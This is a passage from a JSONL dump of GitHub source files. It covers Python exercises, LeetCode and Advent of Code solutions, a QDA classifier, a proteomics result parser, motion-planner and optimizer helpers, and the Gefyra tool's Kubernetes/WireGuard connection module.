index of max number is: {random_list.index(max_num)}')\n# print(f'The index of min number is: {random_list.index(min_num)}')\n# index_max = random_list.index(max_num)\n# index_min = random_list.index(min_num)\n# print(index_max)\n# print(index_min)\n#\n# random_list[index_max], random_list[index_min] = random_list[index_min], random_list[index_max]\n# print(random_list)\n\n# COMMENT FOR ME - WRONG SOLUTION - there are some errors\n\n# =====================================================================================================================\n# Solution from teacher\n\nN = 10\nMIN_ITEM = -800\nMAX_ITEM = 750\narray = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(N)]\nprint(array)\n\n# version 1\nidx_min = 0\nidx_max = 0\n\nfor i in range(len(array)):\n if array[i] < array[idx_min]:\n idx_min = i\n elif array[i] > array[idx_max]:\n idx_max = i\n\narray[idx_min], array[idx_max] = array[idx_max], array[idx_min]\nprint(array)\n\n# version 2\n\nmin_num = min(array)\nmax_num = max(array)\nidx_min = array.index(min_num)\nidx_max = array.index(max_num)\narray[idx_min], array[idx_max] = array[idx_max], array[idx_min]\nprint(array)\n","repo_name":"ZakirovRail/GB_Python_Faculty","sub_path":"1_quarter/Python_Algos_alexey_petrenko/Lesson_3/HW_3/task_3_change_pos_min_max.py","file_name":"task_3_change_pos_min_max.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118700073","text":"from typing import List\n\n\n# https://leetcode.com/problems/where-will-the-ball-fall/discuss/988576/JavaC%2B%2BPython-Solution-with-Explanation\nclass Solution:\n\n def __init__(self):\n self.grid = []\n self.rows = 0\n self.cols = 0\n\n def findBall(self, grid: List[List[int]]) -> List[int]:\n self.grid = grid\n self.rows = len(grid)\n self.cols = len(grid[0])\n return list(map(self.helper, range(self.cols)))\n\n def helper(self, col):\n curr_col = col\n for row in range(self.rows):\n next_col = curr_col + self.grid[row][curr_col]\n if next_col < 0 or self.cols <= next_col:\n return -1\n if self.grid[row][curr_col] != self.grid[row][next_col]:\n return -1\n curr_col = next_col\n return curr_col\n","repo_name":"cabulous/leetcode","sub_path":"python/1706.py","file_name":"1706.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"361513697","text":"# getting data\r\nlines = []\r\nwith open(\"Day5.txt\", \"r\") as f:\r\n for line in f:\r\n line = line.rstrip(\"\\n\").replace(\" -> \", \",\").split(\",\")\r\n lines.append(line)\r\n\r\n# saving dim of our field matrix\r\nxmax = 0\r\nymax = 0\r\n\r\nfor line in lines:\r\n for i, v in enumerate(line):\r\n v = int(v)\r\n if (i+1) % 2 == 0:\r\n if v > ymax:\r\n ymax = v\r\n else:\r\n if v > xmax:\r\n xmax = v\r\n\r\n# creating field matrix\r\nc1 = 0\r\n\r\nfield = []\r\n\r\nwhile c1 < xmax+1:\r\n field.append([])\r\n c1 += 1\r\nfor row in field:\r\n c2 = 0\r\n while c2 < ymax+1:\r\n row.append(0)\r\n c2 += 1\r\n\r\n# filtering only horizontal/vertical lines\r\nfilter_idx = []\r\nfor i, line in enumerate(lines):\r\n if line[0] == line[2] or line[1] == line[3]:\r\n filter_idx.append(i)\r\n\r\nfiltered_lines = []\r\nfor idx in filter_idx:\r\n filtered_lines.append(lines[idx])\r\n\r\n# creating \"elongated\" lines\r\nelongated_lines = []\r\nfor i, line in enumerate(filtered_lines):\r\n for j, v in enumerate(line):\r\n line[j] = int(v)\r\n elongated_lines.append([])\r\n 
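# expand this segment into the full range of x and y indices it covers (inclusive)\r\n    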
x1 = line[0]\r\n y1 = line[1]\r\n x2 = line[2]\r\n y2 = line[3]\r\n x_idx = []\r\n y_idx = []\r\n if x1 != x2:\r\n if x1 < x2:\r\n step = 1\r\n else:\r\n step = -1\r\n for n in range(x1, x2+step, step):\r\n x_idx.append(n)\r\n else:\r\n x_idx.append(x1)\r\n\r\n if y1 != y2:\r\n if y1 < y2:\r\n step = 1\r\n else:\r\n step = -1\r\n for n in range(y1, y2+step, step):\r\n y_idx.append(n)\r\n else:\r\n y_idx.append(y1)\r\n elongated_lines[i].append(x_idx)\r\n elongated_lines[i].append(y_idx)\r\n\r\n\r\n\r\n\r\nfor line in elongated_lines:\r\n for x in line[0]:\r\n for y in line[1]:\r\n field[x][y] += 1\r\n\r\n\r\ncount = 0\r\nfor row in field:\r\n for col in row:\r\n if col >= 2:\r\n count += 1\r\n\r\nprint(count)\r\n","repo_name":"MariusWank/AdventOfCode","sub_path":"Day5/Day5Part1.py","file_name":"Day5Part1.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13442607008","text":"di = [0, 0, -1, 1]\ndj = [1, -1, 0, 0]\n\ndef init():\n n, m = map(int, input().split())\n grid = [list(map(int, input().split())) for _ in range(n)]\n horse = [list(map(lambda x: int(x) - 1, input().split())) for _ in range(m)]\n return n, m, grid, horse\n\ndef find_idx(a):\n for i in range(n):\n for j in range(n):\n for k in range(len(chess[i][j])):\n if chess[i][j][k][0] == a:\n return [i, j, k]\n\ndef num_check():\n for i in range(n):\n for j in range(n):\n if len(chess[i][j]) >= 4:\n return True\n return False\n\ndef turn():\n for num in range(m):\n i, j, k = find_idx(num)\n d = chess[i][j][k][1]\n new_i = i + di[d]\n new_j = j + dj[d]\n\n if not(0 <= new_i < n and 0 <= new_j < n) or grid[new_i][new_j] == 2:\n if d == 0:\n d = 1\n elif d == 1:\n d = 0\n elif d == 2:\n d = 3\n elif d == 3:\n d = 2\n\n chess[i][j][k][1] = d\n new_i = i + di[d]\n new_j = j + dj[d]\n if 0 <= new_i < n and 0 <= new_j < n:\n if grid[new_i][new_j] == 0:\n length = len(chess[i][j][k:])\n for _ in range(length):\n chess[new_i][new_j].append(chess[i][j].pop(k))\n elif grid[new_i][new_j] == 1:\n length = len(chess[i][j][k:])\n for _ in range(length):\n chess[new_i][new_j].append(chess[i][j].pop())\n \n if num_check():\n return False\n return True\n\nn, m, grid, horse = init()\nchess = [[[] for _ in range(n)] for _ in range(n)]\nfor idx, h in enumerate(horse):\n i, j, d = h\n chess[i][j].append([idx, d])\n\nfor i in range(1000):\n flag = turn()\n if not flag:\n break\nif i < 999:\n print(i + 1)\nelse:\n print(-1)","repo_name":"dhleekr/algorithm","sub_path":"22/17837.py","file_name":"17837.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6588444056","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 18:16:15 2019\n\n@author: Vincent Henric & Antoine Lepeltier\n\"\"\"\n\nimport utils\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef mle(X, y):\n n = len(y)\n mu1 = (X[y==1].sum(axis=0))/(y.sum())\n mu0 = (X[y!=1].sum(axis=0))/(n - y.sum())\n sigma1 = ((X[y==1]-mu1).T @ (X[y==1]-mu1))/(y.sum())\n sigma0 = ((X[y!=1]-mu0).T @ (X[y!=1]-mu0))/(n - y.sum())\n pi = y.sum()/n\n return mu0, mu1, sigma0, sigma1, pi\n\ndef linear_coef(mu0, mu1, sigma0, sigma1, pi):\n sigma0_inv = np.linalg.inv(sigma0)\n sigma1_inv = np.linalg.inv(sigma1)\n \n alpha = sigma0_inv - sigma1_inv\n beta = mu1.T @ sigma1_inv - mu0.T @ sigma0_inv\n \n a = 0.5 * alpha[0,0]\n b = 0.5 * alpha[0,1]\n c = 0.5 * alpha[1,1]\n d = beta[0]\n e = beta[1]\n f = 
utils.logit(pi) + 0.5 * np.log(np.linalg.det(sigma0) / np.linalg.det(sigma1)) - 0.5 * mu1.T @ sigma1_inv @ mu1 + 0.5 * mu0.T @ sigma0_inv @ mu0\r\n \r\n return a, b, c, d, e, f\r\n\r\ndef log_odds(x, mu0, mu1, sigma0, sigma1, pi):\r\n sigma0_inv = np.linalg.inv(sigma0)\r\n sigma1_inv = np.linalg.inv(sigma1)\r\n return utils.logit(pi) + 0.5 * np.log(np.linalg.det(sigma0) / np.linalg.det(sigma1)) - 0.5 * (x-mu1).T@sigma1_inv@(x-mu1) + 0.5 * (x-mu0).T@sigma0_inv@(x-mu0)\r\n\r\ndef proba_func(x, mu0, mu1, sigma0, sigma1, pi):\r\n exponent = -1 * log_odds(x, mu0, mu1, sigma0, sigma1, pi)\r\n return 1/(1+np.exp(exponent))\r\n\r\ndef predict(x, mu0, mu1, sigma0, sigma1, pi):\r\n return log_odds(x, mu0, mu1, sigma0, sigma1, pi)>=0\r\n\r\ndef conics(x, y, coefs):\r\n return coefs['a']*x*x + 2*coefs['b']*x*y + coefs['c']*y*y + coefs['d']*x + coefs['e']*y + coefs['f']\r\n\r\ndef plot_boundary(X, y, coefs, title='', colormap = False, save = False):\r\n x_min, x_max = np.min(X[:,0]), np.max(X[:,0])\r\n y_min, y_max = np.min(X[:,1]), np.max(X[:,1])\r\n offset = 1\r\n \r\n q = 500\r\n tx = np.linspace(x_min - offset, x_max + offset, num=q) \r\n ty = np.linspace(y_min - offset, y_max + offset, num=q) \r\n X_mesh, Y_mesh = np.meshgrid(tx, ty)\r\n Z = conics(X_mesh, Y_mesh, coefs)\r\n \r\n plt.figure(figsize = (9, 9))\r\n if colormap:\r\n plt.clf()\r\n plt.imshow(Z, origin=\"lower\", extent=[x_min - offset, x_max + offset, y_min - offset, y_max + offset], aspect = (x_max - x_min)/(y_max - y_min))\r\n contours = plt.contour(X_mesh, Y_mesh, Z, levels=0, colors='g')\r\n contours.collections[0].set_label('Decision boundary')\r\n plt.scatter(X[y == 0,0], X[y == 0,1], label = 'class 0')\r\n plt.scatter(X[y == 1,0], X[y == 1,1], label = 'class 1')\r\n\r\n plt.xlim(x_min - offset, x_max + offset)\r\n plt.ylim(y_min - offset, y_max + offset)\r\n plt.xlabel('x1')\r\n plt.ylabel('x2')\r\n plt.title(title)\r\n plt.legend(loc=\"upper right\", fontsize=16)\r\n if save:\r\n print(\"Saving figure to results folder.\")\r\n plt.savefig('results/{}'.format(utils.sanitize(title)))\r\n plt.show()","repo_name":"VincentHenric/PGM_homework_1","sub_path":"QDA.py","file_name":"QDA.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12408675913","text":"from abc import ABC, abstractmethod\nfrom time import perf_counter\n\nfrom environment.static_env import StaticEnv\nfrom environment.dynamic_env import DynamicEnv\nfrom utils.utils import DotDict, create_dot_dict\n\n\nclass TimeOutException(Exception):\n def __init__(self, message):\n super(TimeOutException, self).__init__(message)\n\n\nclass AbstractPlanner(ABC):\n\n def plan(self, env, start, goal, timeout, **kwargs):\n '''\n return an instance of 
DotDict with:\n 1. solution: a list of waypoints. if there is no solution found, the value is None\n 2. running_time: the overall running time\n 3. num_collision_check: the number of collision checking during the planning\n 4. num_node: the number of sampled nodes\n '''\n if isinstance(env, StaticEnv):\n assert env.state_fp(start) and env.state_fp(goal)\n elif isinstance(env, DynamicEnv):\n assert env.state_fp(start,0) and env.state_fp(goal,-1)\n\n self.t0 = perf_counter()\n try:\n result = self._plan(env, start, goal, timeout, **kwargs)\n except TimeOutException:\n result = self._catch_timeout(env, start, goal, timeout, **kwargs)\n assert isinstance(result, DotDict)\n assert 'solution' in result.keys()\n result.running_time = perf_counter() - self.t0\n result.num_collision_check = env.robot.collision_check_count\n result.num_node = self._num_node()\n return result\n\n def check_timeout(self, timeout):\n '''\n a function that needs to be called consistently during the planning\n ensure that the planner will be terminated when timeout happens\n '''\n if timeout[0] == 'time':\n if (perf_counter() - self.t0) > timeout[1]:\n raise TimeOutException(\"Timeout - planner fails to find a solution.\")\n else:\n return False\n elif timeout[0] == 'node':\n if self._num_node() > timeout[1]:\n raise TimeOutException(\"Timeout - planner fails to find a solution.\") \n else:\n return False \n\n @abstractmethod\n def _plan(self, env, start, goal, timeout, **kwargs):\n '''\n return an instance of DotDict with:\n 1. solution: a list of waypoints. if there is no solution found, the value is None\n '''\n raise NotImplementedError\n \n @abstractmethod\n def _num_node(self):\n '''\n return the number of sampled nodes\n '''\n raise NotImplementedError\n\n def _catch_timeout(self, env, start, goal, timeout, **kwargs):\n '''\n return an instance of DotDict\n '''\n return create_dot_dict(solution=None)","repo_name":"aaucsd/lemp","sub_path":"planner/abstract_planner.py","file_name":"abstract_planner.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"35161651045","text":"import re\nimport xml.dom.minidom\nfrom xml.dom.minidom import parse\nimport re\nimport os\nimport operator\nimport numpy as np\nimport chardet\n\n\n# read experiment design file\ndef experiment_design(experiment_design_file):\n exp = {}\n f = open(experiment_design_file, 'rb')\n data = f.read()\n file_encoding = chardet.detect(data).get('encoding')\n f.close()\n with open(experiment_design_file, encoding = file_encoding) as fi:\n for line in fi:\n if not line.startswith(\"File\"):\n li = line.strip('\\n').split('\\t')\n filex = li[0]\n expx = li[1]\n fracx = li[2]\n masicx = li[3]\n if expx not in exp:\n exp[expx] = [[filex, masicx]]\n else:\n exp[expx].append([filex, masicx])\n return exp\n\n\n# get the lowest score of FDR filter\ndef get_i(li):\n j = 0.0\n for i in range(1, len(li)):\n s2 = li[i].strip().split('\\t')\n if s2[5] == '1':\n j = j + 1\n fdr = j / i\n if fdr >= 0.01:\n x = float(s2[3])\n return x\n return 0\n\n#####################################################\n#######################################################\n###############################################################\n\n# MASIC ANALYSE\ndef masic_analyse_TMT(filey):\n fi = open(filey)\n line1 = fi.readline().strip('\\n').split('\\t')\n matrix = {}\n exp_num = []\n exp = []\n for i, title in enumerate(line1):\n if re.search('Ion_[\\d\\.]+$', title):\n 
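# record both the column position and the reporter-ion column name\n                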
exp_num.append(i)\n exp.append(title)\n\n for line in fi:\n li = line.strip('\\n').split('\\t')\n scan_num = li[1]\n Ion_inten = li[exp_num[0]: exp_num[-1] + 1]\n matrix[scan_num] = dict(zip(exp, Ion_inten))\n\n return matrix, exp\n\n\ndef masic_analyse_label_free(filey):\n fi = open(filey)\n line1 = fi.readline().strip('\\n').split('\\t')\n matrix = {}\n for i, title in enumerate(line1):\n if title == \"FragScanNumber\":\n scan = i\n elif title == \"PeakArea\":\n inten = i\n for line in fi:\n lines = line.strip('\\n').split('\\t')\n matrix[lines[scan]] = float(lines[inten])\n return matrix\n\n\n# get specified intensity of one peptide in specified channel\ndef merge(masic_matrix, ids, is_labeled, exp=\"null\"):\n inten = 0\n if is_labeled == 1:\n for idx in ids:\n inten = float(masic_matrix[str(idx)][exp]) + inten\n\n else:\n #for idx in ids:\n #inten = float(masic_matrix[str(idx)]) + inten\n inten = np.mean([float(masic_matrix[str(idx)]) for idx in ids])\n return inten\n\n#####################################################\n#######################################################\n###############################################################\n\ndef tandem_analyse(filex, main_path):\n tree = xml.dom.minidom.parse(filex)\n root = tree.documentElement\n source = root.getAttribute('label')\n p = re.compile(r':reversed$')\n fo = open(main_path + \"/temp/\" + 'analyse.txt', 'w')\n fo.write('group_id' + '\\t' + 'expect' + '\\t' + 'pep_sumI' +\n '\\t' + 'hyperscore' + '\\t' + 'seq' + '\\t' + 'isReversed' + '\\t' + 'scan' + '\\n')\n\n for node in root.childNodes:\n if node.nodeType != 3 and node.getAttribute('type') == 'model':\n pep_sumI = node.getAttribute('sumI')\n group_id = node.getAttribute('id')\n group_expect = node.getAttribute('expect')\n isReversed = 0\n protein = node.getElementsByTagName(\"protein\")\n groups = node.getElementsByTagName(\"group\")\n for pro in protein:\n peptide = pro.getElementsByTagName('domain')\n hyperscore = peptide[0].getAttribute('hyperscore')\n expect = peptide[0].getAttribute('expect')\n seq = peptide[0].getAttribute('seq')\n note = pro.getElementsByTagName('note')\n text = note[0].firstChild.data\n if p.search(text) == None:\n pass\n else:\n isReversed = 1\n break\n for gro in groups:\n if gro.getAttribute('label') == \"fragment ion mass spectrum\":\n note2 = gro.getElementsByTagName('note')\n scan_info = note2[0].firstChild.data\n scan_num = re.search(\"scan=(\\d+).*\", scan_info).group(1)\n\n fo.write(group_id + '\\t' + expect + '\\t' + pep_sumI +\n '\\t' + hyperscore + '\\t' + seq + '\\t' + str(isReversed) + '\\t' + scan_num + '\\n')\n\n fo.close()\n\n fi2 = open(main_path + \"/temp/\" + 'analyse.txt', 'r')\n fo2 = open(main_path + \"/temp/\" + 'res.txt', 'w')\n lines1 = fi2.readlines()\n dic = {}\n dic2 = {}\n for i in range(1, len(lines1)):\n s1 = lines1[i].strip().split('\\t')\n m = s1[0]\n dic2[i] = m\n dic[m] = float(s1[3])\n sorted_dic = sorted(dic.items(), key=operator.itemgetter(1), reverse=True)\n fo2.write(lines1[0])\n for i in sorted_dic:\n for j in dic2:\n if i[0] == dic2[j]:\n fo2.write(lines1[j])\n break\n fi2.close()\n fo2.close()\n filename_in = \"FDR_output.txt\"\n fi3 = open(main_path + \"/temp/\" + 'res.txt', 'r')\n #fo3 = open(main_path + \"/temp/\" + 'test_' + filename_in, 'w')\n lines2 = tuple(fi3.readlines())\n score = get_i(lines2)\n fi3.close()\n matrix = {}\n\n for i in lines1:\n s3 = i.strip().split('\\t')\n if i.strip().split('\\t')[0] != 'group_id' and s3[5] == '0' and float(s3[3]) > score:\n seq = s3[4]\n scan = s3[6]\n 
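# group scan numbers by peptide sequence so their intensities can be merged later\n            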
if seq not in matrix:\n matrix[seq] = {\"scan\": [scan]}\n else:\n matrix[seq][\"scan\"].append(scan)\n\n return matrix\n\n#####################################################\n#######################################################\n###############################################################\n\ndef tandem_matrix_analyse(filein, is_labeled, main_path):\n path_temp = main_path + \"/temp/\"\n if not os.path.exists(path_temp):\n os.mkdir(path_temp)\n matrix = {}\n exp_des = experiment_design(filein)\n if is_labeled == 1:\n for exp_l in exp_des:\n channel = []\n for frac in exp_des[exp_l]:\n tandem_file = frac[0]\n masic_file = frac[1]\n tandem_output_trans = tandem_analyse(tandem_file, main_path)\n masic_output_trans_all = masic_analyse_TMT(masic_file)\n masic_output_trans = masic_output_trans_all[0]\n if len(channel) == 0:\n channel = masic_output_trans_all[1]\n for expx in channel:\n exp_name = expx + \"_\" + exp_l\n if exp_name not in matrix:\n matrix[exp_name] = {}\n\n for peptide in tandem_output_trans:\n s_num = tuple(tandem_output_trans[peptide][\"scan\"])\n for expy in channel:\n if peptide not in matrix[expy + \"_\" + exp_l]:\n matrix[expy + \"_\" + exp_l][peptide] = merge(masic_output_trans, s_num, 1, expy)\n else:\n matrix[expy + \"_\" + exp_l][peptide] += merge(masic_output_trans, s_num, 1, expy)\n\n else:\n for exp_l in exp_des:\n if exp_l not in matrix:\n matrix[exp_l] = {}\n for frac in exp_des[exp_l]:\n tandem_file = frac[0]\n masic_file = frac[1]\n tandem_output_trans = tandem_analyse(tandem_file, main_path)\n masic_output_trans = masic_analyse_label_free(masic_file)\n for peptide in tandem_output_trans:\n s_num = tuple(tandem_output_trans[peptide][\"scan\"])\n if peptide not in matrix[exp_l]:\n matrix[exp_l][peptide] = merge(masic_output_trans, s_num, 0)\n else:\n matrix[exp_l][peptide] += merge(masic_output_trans, s_num, 0)\n\n return matrix\n","repo_name":"MAlinkous/test","sub_path":"readTandemResults.py","file_name":"readTandemResults.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6774734631","text":"from typing import Dict, Iterable\nimport torch\nimport torch.optim as optim\n\ndef deserializeOptimizer(learnables: Iterable[torch.Tensor], params: Dict):\n name = params['name']\n alpha = params['alpha']\n\n if name == 'ADAM':\n b1 = params['beta1']\n b2 = params['beta2']\n\n return optim.Adam(learnables, lr=alpha, betas=(b1, b2))\n\n if name == 'RMSProp':\n b = params['beta']\n\n return optim.RMSprop(learnables, lr=alpha, alpha=b)\n\n if name == 'SGD':\n return optim.SGD(learnables, lr=alpha)\n\n raise NotImplementedError()\n","repo_name":"andnp/single-hyperparameter-benchmark","sub_path":"paper/src/agents/Network/serialize.py","file_name":"serialize.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19340413178","text":"import base64\nimport logging\nimport os\nfrom pathlib import Path\nimport socket\nimport time\n\nfrom typing import IO, List, Optional, TYPE_CHECKING\nfrom gefyra.api.clients import get_client\nfrom gefyra.exceptions import GefyraConnectionError\nfrom gefyra.local.minikube import detect_minikube_config\nfrom .utils import stopwatch\n\nif TYPE_CHECKING:\n from docker.models.networks import Network\n\n\nfrom gefyra.configuration import ClientConfiguration, get_gefyra_config_location\nfrom gefyra.local.cargo import (\n 
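# helpers for building and probing the WireGuard tunnel\n    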
create_wireguard_config,\n get_cargo_ip_from_netaddress,\n probe_wireguard_connection,\n)\nfrom gefyra.local.networking import get_or_create_gefyra_network, handle_remove_network\nfrom gefyra.local.utils import (\n compose_kubeconfig_for_serviceaccount,\n handle_docker_get_or_create_container,\n)\nfrom gefyra.types import GefyraClientConfig, GefyraClientState, GefyraConnectionItem\n\n\nlogger = logging.getLogger(__name__)\n\n\n@stopwatch\ndef connect( # noqa: C901\n connection_name: str,\n client_config: Optional[IO],\n minikube_profile: Optional[str] = None,\n probe_timeout: int = 60,\n) -> bool:\n import kubernetes\n import docker\n\n cargo_container = None\n # if this connection already exists, just restore it\n if connection_name in [conns.name for conns in list_connections()]:\n logger.debug(f\"Restoring existing connection {connection_name}\")\n config = ClientConfiguration(connection_name=connection_name)\n cargo_container = config.DOCKER.containers.get(config.CARGO_CONTAINER_NAME)\n client = get_client(config.CLIENT_ID, connection_name=config.CONNECTION_NAME)\n else:\n # connection does not exist, so create it\n if client_config is None:\n raise GefyraConnectionError(\n \"Connection is not yet created and no client configuration has been provided.\"\n )\n logger.debug(f\"Creating new connection {connection_name}\")\n file_str = client_config.read()\n client_config.close()\n gclient_conf = GefyraClientConfig.from_json_str(file_str)\n client = get_client(gclient_conf.client_id, connection_name=connection_name)\n loc = os.path.join(\n get_gefyra_config_location(),\n f\"{connection_name}.yaml\",\n )\n # this kubeconfig is being used by the client to operate in the cluster\n kubeconfig_str = compose_kubeconfig_for_serviceaccount(\n gclient_conf.kubernetes_server,\n gclient_conf.ca_crt,\n \"gefyra\",\n base64.b64decode(gclient_conf.token).decode(\"utf-8\"),\n )\n with open(loc, \"w\") as f:\n f.write(kubeconfig_str)\n logger.info(f\"Client kubeconfig saved to {loc}\")\n\n if minikube_profile:\n logger.debug(f\"Minikube profile detected: {minikube_profile}\")\n mini_conf = detect_minikube_config(minikube_profile)\n logger.debug(mini_conf)\n gclient_conf.gefyra_server = (\n f\"{mini_conf['cargo_endpoint_host']}:{mini_conf['cargo_endpoint_port']}\"\n )\n\n config = ClientConfiguration(\n connection_name=connection_name,\n kube_config_file=Path(loc),\n client_id=gclient_conf.client_id,\n cargo_endpoint_host=gclient_conf.gefyra_server.split(\":\")[0],\n cargo_endpoint_port=gclient_conf.gefyra_server.split(\":\")[1],\n cargo_container_name=f\"gefyra-cargo-{connection_name}\",\n )\n config.CARGO_PROBE_TIMEOUT = probe_timeout\n\n _retry = 0\n while _retry < 5:\n gefyra_network = get_or_create_gefyra_network(config)\n try:\n client.activate_connection(\n gefyra_network.attrs[\"IPAM\"][\"Config\"][0][\"Subnet\"]\n )\n break\n except kubernetes.client.exceptions.ApiException as e:\n if e.status == 500:\n _retry += 1\n logger.debug(f\"Could not activate connection, retrying {_retry}/5...\")\n # if the given subnet is taken in the cluster (by another client), recreate the network and try again\n # hopefully the IPAM config will give a new subnet\n gefyra_network.remove()\n else:\n raise GefyraConnectionError(\"Could not activate connection\") from None\n\n # busy wait for the client to enter the ACTIVE state\n _i = 0\n while _i < config.CONNECTION_TIMEOUT:\n if client.state == GefyraClientState.ACTIVE:\n break\n else:\n _i += 1\n time.sleep(0.5)\n else:\n raise GefyraConnectionError(\"Could not activate 
connection\") from None\n client.update()\n\n # since this connection was (re)activated, save the current wireguard config (again)\n wg_conf = os.path.join(\n get_gefyra_config_location(), f\"{config.CONNECTION_NAME}.conf\"\n )\n if not client.provider_config:\n raise GefyraConnectionError(\n \"Could not get provider config for client\"\n ) from None\n\n if config.CARGO_ENDPOINT is None:\n config.CARGO_ENDPOINT = client.provider_config.pendpoint\n logger.debug(config.CARGO_ENDPOINT)\n # busy wait to resolve the cargo endpoint, making sure it's actually resolvable from this host\n _i = 0\n while _i < config.CONNECTION_TIMEOUT:\n try:\n socket.gethostbyname_ex(config.CARGO_ENDPOINT.split(\":\")[0])\n break\n except (socket.gaierror, socket.herror): # [Errno -2] Name or service not known\n logger.debug(\n f\"Could not resolve host '{config.CARGO_ENDPOINT.split(':')[0]}', \"\n f\"retrying {_i}/{config.CONNECTION_TIMEOUT}...\"\n )\n _i += 1\n time.sleep(1)\n else:\n raise GefyraConnectionError(\n f\"Cannot resolve host '{config.CARGO_ENDPOINT.split(':')[0]}'.\"\n ) from None\n\n with open(wg_conf, \"w\") as f:\n f.write(\n create_wireguard_config(\n client.provider_config, config.CARGO_ENDPOINT, config.WIREGUARD_MTU\n )\n )\n\n cargo_ip_address = get_cargo_ip_from_netaddress(\n gefyra_network.attrs[\"IPAM\"][\"Config\"][0][\"Subnet\"]\n )\n\n try:\n if not cargo_container:\n cargo_container = handle_docker_get_or_create_container(\n config,\n f\"{config.CARGO_CONTAINER_NAME}\",\n config.CARGO_IMAGE,\n detach=True,\n cap_add=[\"NET_ADMIN\"],\n privileged=True,\n volumes=[\n \"/var/run/docker.sock:/var/run/docker.sock\",\n f\"{wg_conf}:/config/wg0.conf\",\n ],\n pid_mode=\"host\",\n )\n\n if minikube_profile:\n mini_conf = detect_minikube_config(minikube_profile)\n if mini_conf[\"network_name\"]:\n logger.debug(\"Joining minikube network\")\n minikube_net: \"Network\" = config.DOCKER.networks.get(\n mini_conf[\"network_name\"]\n )\n minikube_net.connect(cargo_container)\n logger.debug(f\"Cargo gefyra net ip address: {cargo_ip_address}\")\n gefyra_network.connect(cargo_container, ipv4_address=cargo_ip_address)\n cargo_container.start()\n time.sleep(1)\n except docker.errors.APIError as e:\n try:\n cargo_container and cargo_container.remove()\n except docker.errors.APIError:\n pass\n raise GefyraConnectionError(f\"Could not start Cargo container: {e}\") from None\n\n # Confirm the wireguard connection working\n logger.debug(\"Checking wireguard connection\")\n probe_wireguard_connection(config)\n return True\n\n\n@stopwatch\ndef disconnect(connection_name: str) -> bool:\n import docker\n\n config = ClientConfiguration(connection_name=connection_name)\n client = get_client(config.CLIENT_ID, connection_name=connection_name)\n get_or_create_gefyra_network(config)\n try:\n cargo_container = config.DOCKER.containers.get(\n f\"{config.CARGO_CONTAINER_NAME}\",\n )\n cargo_container.stop()\n except docker.errors.NotFound:\n pass\n client.deactivate_connection()\n return True\n\n\n@stopwatch\ndef list_connections() -> List[GefyraConnectionItem]:\n from gefyra.local import CARGO_LABEL, CONNECTION_NAME_LABEL, VERSION_LABEL\n\n config = ClientConfiguration()\n result = []\n containers = config.DOCKER.containers.list(\n all=True, filters={\"label\": f\"{CARGO_LABEL[0]}={CARGO_LABEL[1]}\"}\n )\n for cargo_container in containers:\n if cargo_container.status == \"running\":\n try:\n config = ClientConfiguration(cargo_container_name=cargo_container.name)\n config.CARGO_PROBE_TIMEOUT = 1 # don't wait too long for 
the probe\n probe_wireguard_connection(config)\n state = \"running\"\n except GefyraConnectionError:\n state = \"error\"\n else:\n state = \"stopped\"\n result.append(\n GefyraConnectionItem(\n **{\n \"name\": cargo_container.labels.get(\n CONNECTION_NAME_LABEL, \"unknown\"\n ),\n \"version\": cargo_container.labels.get(VERSION_LABEL, \"unknown\"),\n \"created\": cargo_container.attrs.get(\"Created\", \"unknown\"),\n \"status\": state,\n }\n )\n )\n return result\n\n\n@stopwatch\ndef remove_connection(connection_name: str):\n import docker\n\n config = ClientConfiguration(connection_name=connection_name)\n try:\n get_client(\n config.CLIENT_ID, connection_name=connection_name\n ).deactivate_connection()\n except Exception as e: # noqa E722\n logger.debug(e)\n pass\n try:\n cargo_container = config.DOCKER.containers.get(\n f\"{config.CARGO_CONTAINER_NAME}\",\n )\n cargo_container.remove(force=True)\n except docker.errors.NotFound:\n pass\n handle_remove_network(config)\n try:\n # remove kubeconfig file\n os.remove(os.path.join(get_gefyra_config_location(), f\"{connection_name}.yaml\"))\n except OSError:\n pass\n try:\n # remove wireguard config file\n os.remove(\n os.path.join(get_gefyra_config_location(), f\"{config.CONNECTION_NAME}.conf\")\n )\n except OSError:\n pass\n","repo_name":"gefyrahq/gefyra","sub_path":"client/gefyra/api/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","stars":575,"dataset":"github-code","pt":"72"} +{"seq_id":"69948853992","text":"n = 0\r\ntry:\r\n x = int(input(\"Enter x: \"))\r\n y = int(input(\"Enter y: \"))\r\n #a specific error can be raised explicitly \r\n if y==0:\r\n raise ZeroDivisionError(\"y=0 is not accepted\")\r\n if x%2 !=0:\r\n raise Exception(\"You must enter an even number x\")\r\n n = x/y\r\nexcept NameError as err1: \r\n print(\"Error 1: \", err1)\r\nexcept ZeroDivisionError as err2:\r\n print(\"Error: \", err2)\r\nexcept ValueError as err3: \r\n print(\"Error 3: You must enter a number\")\r\nexcept Exception as err3: #The generic exception always comes last, after the specific ones\r\n print(\"Error: \", err3)\r\n\r\nprint(\"n = \", n)","repo_name":"ttri1507/python_basic","sub_path":"Bai_10_raise.py","file_name":"Bai_10_raise.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13332634425","text":"import 